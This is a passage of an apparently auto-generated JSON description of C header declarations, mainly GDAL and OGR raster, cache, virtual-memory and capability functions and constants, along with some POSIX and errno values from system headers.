"type": { "tag": "GDALColorTableH" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATTranslateToColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1170:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "nEntryCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALColorTableH" } }, { "tag": "function", "name": "GDALRATDumpReadable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1172:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRATClone", "ns": 0, "location": "/usr/include/gdal/gdal.h:1175:5", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "function", "name": "GDALRATSerializeJSON", "ns": 0, "location": "/usr/include/gdal/gdal.h:1178:5", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "GDALRATGetRowOfValue", "ns": 0, "location": "/usr/include/gdal/gdal.h:1180:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATRemoveStatistics", "ns": 0, "location": "/usr/include/gdal/gdal.h:1181:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALSetCacheMax", "ns": 0, "location": "/usr/include/gdal/gdal.h:1187:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nBytes", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetCacheMax", "ns": 0, "location": "/usr/include/gdal/gdal.h:1188:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetCacheUsed", "ns": 0, "location": "/usr/include/gdal/gdal.h:1189:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALSetCacheMax64", "ns": 0, "location": "/usr/include/gdal/gdal.h:1190:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nBytes", "type": { "tag": "GIntBig" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALGetCacheMax64", "ns": 0, "location": "/usr/include/gdal/gdal.h:1191:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "GDALGetCacheUsed64", "ns": 0, "location": "/usr/include/gdal/gdal.h:1192:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "GDALFlushCacheBlock", "ns": 0, "location": "/usr/include/gdal/gdal.h:1194:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDatasetGetVirtualMem", "ns": 0, "location": "/usr/include/gdal/gdal.h:1200:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBufXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBufYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBufType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nBandCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panBandMap", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": "GIntBig" } }, { "tag": "parameter", "name": "nBandSpace", "type": { "tag": "GIntBig" } }, { "tag": "parameter", "name": "nCacheSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nPageSizeHint", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "bSingleThreadUsage", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "GDALRasterBandGetVirtualMem", "ns": 0, "location": "/usr/include/gdal/gdal.h:1215:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBufXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nBufYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBufType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nPixelSpace", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nLineSpace", "type": { "tag": "GIntBig" } }, { "tag": "parameter", "name": "nCacheSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nPageSizeHint", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "bSingleThreadUsage", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "GDALGetVirtualMemAuto", "ns": 0, "location": "/usr/include/gdal/gdal.h:1228:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "pnPixelSpace", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnLineSpace", "type": { "tag": ":pointer", "type": { "tag": "GIntBig" } } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "enum", "ns": 0, "name": "", "id": 95, "location": "/usr/include/gdal/gdal.h:1235:9", "fields": [{ "tag": "field", "name": "GTO_TIP", "value": 0 }, { "tag": "field", "name": "GTO_BIT", "value": 1 }, { "tag": "field", "name": "GTO_BSQ", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "GDALTileOrganization", "location": "/usr/include/gdal/gdal.h:1243:3", "type": { "tag": ":enum", "name": "", "id": 95 } }, { "tag": "function", "name": "GDALDatasetGetTiledVirtualMem", "ns": 0, "location": "/usr/include/gdal/gdal.h:1245:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hDS", "type": { "tag": "GDALDatasetH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nTileXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nTileYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBufType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nBandCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "panBandMap", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "eTileOrganization", "type": { "tag": "GDALTileOrganization" } }, { "tag": "parameter", "name": "nCacheSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "bSingleThreadUsage", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "GDALRasterBandGetTiledVirtualMem", "ns": 0, "location": "/usr/include/gdal/gdal.h:1257:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "nXOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYOff", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nTileXSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nTileYSize", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "eBufType", "type": { "tag": "GDALDataType" } }, { "tag": "parameter", "name": "nCacheSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "bSingleThreadUsage", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLVirtualMem" } } }, { "tag": "function", "name": "GDALCreatePansharpenedVRT", "ns": 0, "location": "/usr/include/gdal/gdal.h:1271:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszXML", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "hPanchroBand", "type": { "tag": "GDALRasterBandH" } }, { "tag": "parameter", "name": "nInputSpectralBands", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pahInputSpectralBands", "type": { "tag": ":pointer", "type": { "tag": "GDALRasterBandH" } } }], "return-type": { "tag": "GDALDatasetH" } }, { "tag": "function", "name": "GDALGetJPEG2000Structure", "ns": 0, "location": "/usr/include/gdal/gdal.h:1280:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "const", "name": "OGR_CORE_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "DEFINE_OGRFeatureH", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:288:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "OGR_API_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "OGRERR_NOT_ENOUGH_MEMORY", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:294:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "OGRERR_NOT_ENOUGH_DATA", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:293:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "OGRERR_NONE", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:292:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "OGRERR_NON_EXISTING_FEATURE", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:301:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "OGRERR_INVALID_HANDLE", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:300:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "OGRERR_UNSUPPORTED_SRS", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:299:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "OGRERR_FAILURE", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:298:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "OGRERR_CORRUPT_DATA", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:297:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "OGRERR_UNSUPPORTED_OPERATION", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:296:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "OGRERR_UNSUPPORTED_GEOMETRY_TYPE", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:295:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_POSIX_READER_WRITER_LOCKS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:134:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_SHELL", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:137:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_TIMEOUTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:140:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_SPIN_LOCKS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:143:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_LFS64_STDIO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:119:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_SHARED_MEMORY_OBJECTS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:122:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_CPUTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:125:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_POSIX_THREAD_CPUTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:128:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_POSIX_REGEXP", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:131:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_PRIORITIZED_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:111:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_LFS64_ASYNCHRONOUS_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:114:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_LFS_LARGEFILE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:117:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_LFS64_LARGEFILE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:118:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_REALTIME_SIGNALS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:103:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_ASYNCHRONOUS_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:106:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_ASYNC_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:107:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_LFS_ASYNCHRONOUS_IO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_SPAWN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:146:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_POSIX_TIMERS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix_opt.h:149:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "EISCONN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:89:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 106 }, { "tag": "const", "name": "ENOTCONN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:90:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 107 }, { "tag": "const", "name": "ODsCCreateGeomFieldAfterCreateLayer", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:773:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CreateGeomFieldAfterCreateLayer" }, { "tag": "const", "name": "ESHUTDOWN", "ns": 0, "location": "/usr/include/asm-generic/errno.h:91:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 108 }, { "tag": "const", "name": "ODsCDeleteLayer", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:772:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DeleteLayer" }, { "tag": "const", "name": "ETOOMANYREFS", "ns": 0, "location": "/usr/include/asm-generic/errno.h:92:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 109 }, { "tag": "const", "name": "ODsCCreateLayer", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:771:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CreateLayer" }, { "tag": "const", "name": "ETIMEDOUT", "ns": 0, "location": "/usr/include/asm-generic/errno.h:93:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 110 }, { "tag": "const", "name": "OLCMeasuredGeometries", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:769:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "MeasuredGeometries" }, { "tag": "const", "name": "ODsCMeasuredGeometries", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:777:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "MeasuredGeometries" }, { "tag": "const", "name": "ENETRESET", "ns": 0, "location": "/usr/include/asm-generic/errno.h:85:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 102 }, { "tag": "const", "name": "ECONNABORTED", "ns": 0, "location": "/usr/include/asm-generic/errno.h:86:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 103 }, { "tag": "const", "name": "ECONNRESET", "ns": 0, "location": "/usr/include/asm-generic/errno.h:87:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 104 }, { "tag": "const", "name": "ODsCTransactions", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:775:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "Transactions" }, { "tag": "const", "name": "ENOBUFS", "ns": 0, "location": "/usr/include/asm-generic/errno.h:88:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 105 }, { "tag": "const", "name": "ODsCCurveGeometries", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:774:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CurveGeometries" }, { "tag": "const", "name": "OLCFastSetNextByIndex", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:764:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "FastSetNextByIndex" }, { "tag": "const", "name": "ODsCEmulatedTransactions", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:776:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "EmulatedTransactions" }, { "tag": "const", "name": "OLCDeleteFeature", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:763:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DeleteFeature" }, { "tag": "const", "name": "OLCTransactions", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:762:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "Transactions" }, { "tag": "const", "name": "OLCAlterFieldDefn", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:761:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "AlterFieldDefn" }, { "tag": "const", "name": "OLCCurveGeometries", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:768:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CurveGeometries" }, { "tag": "const", "name": "OLCCreateGeomField", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:767:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CreateGeomField" }, { "tag": "const", "name": "OLCIgnoreFields", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:766:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "IgnoreFields" }, { "tag": "const", "name": "OLCStringsAsUTF8", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:765:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "StringsAsUTF8" }, { "tag": "const", "name": "OLCFastFeatureCount", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:756:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "FastFeatureCount" }, { "tag": "const", "name": "OLCFastSpatialFilter", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:755:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "FastSpatialFilter" }, { "tag": "const", "name": "OLCReorderFields", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:760:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "ReorderFields" }, { "tag": "const", "name": "OLCRandomWrite", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:754:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "RandomWrite" }, { "tag": "const", "name": "OLCDeleteField", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:759:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "DeleteField" }, { "tag": "const", "name": "OLCSequentialWrite", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:753:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "SequentialWrite" }, { "tag": "const", "name": "OLCCreateField", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:758:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "CreateField" }, { "tag": "const", "name": "OLCFastGetExtent", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:757:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "FastGetExtent" }, { "tag": "const", "name": "OLCRandomRead", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:752:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "RandomRead" }, { "tag": "const", "name": "CPL_MINIXML_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/cpl_minixml.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EREMOTE", "ns": 0, "location": "/usr/include/asm-generic/errno.h:49:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 66 }, { "tag": "const", "name": "_CMP_NLE_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1582:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 22 }, { "tag": "const", "name": "STDC_HEADERS", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:311:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "ENOLINK", "ns": 0, "location": "/usr/include/asm-generic/errno.h:50:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 67 }, { "tag": "const", "name": "ENOPKG", "ns": 0, "location": "/usr/include/asm-generic/errno.h:48:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65 }, { "tag": "const", "name": "_CMP_NLT_UQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1581:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 21 }, { "tag": "const", "name": "UNIX_STDIO_64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:314:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_CMP_NEQ_US", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avxintrin.h:1580:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "_BITS_TIME64_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time64.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 